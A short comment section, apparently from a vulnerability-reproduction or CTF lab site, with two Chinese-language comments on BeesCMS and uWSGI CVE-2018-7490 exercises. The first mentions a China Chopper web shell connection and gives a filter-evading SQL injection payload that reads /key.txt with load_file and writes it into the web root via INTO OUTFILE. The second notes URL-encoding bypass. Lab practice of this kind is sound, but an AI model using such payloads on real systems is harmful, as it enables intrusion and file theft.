评论信息

• BeesCMS系统漏洞分析溯源

  使用了菜刀连接上，文件打不开 ，（不知道是我的菜刀问题，还是环境问题）那就换一个思路 使用load_file 函数来读取到 key.txt 文件，直接访问 写出来的文件即可。 admin’un union ion seselectlect 1,load_file('/key.txt'),3,4,5 in into outoutfilefile ‘/var/www/html/a.txt’#

  2020-01-20 11:55:11

  赞 ( 7 )

• uWSGI 漏洞复现（CVE-2018-7490）

  使用对url进行编码绕过，uWSGI这个是一个web中间件程序 我还是不明白 如何找到key.txt 在robot.txt没有提示

  2020-01-06 15:07:34

  赞 ( 1 )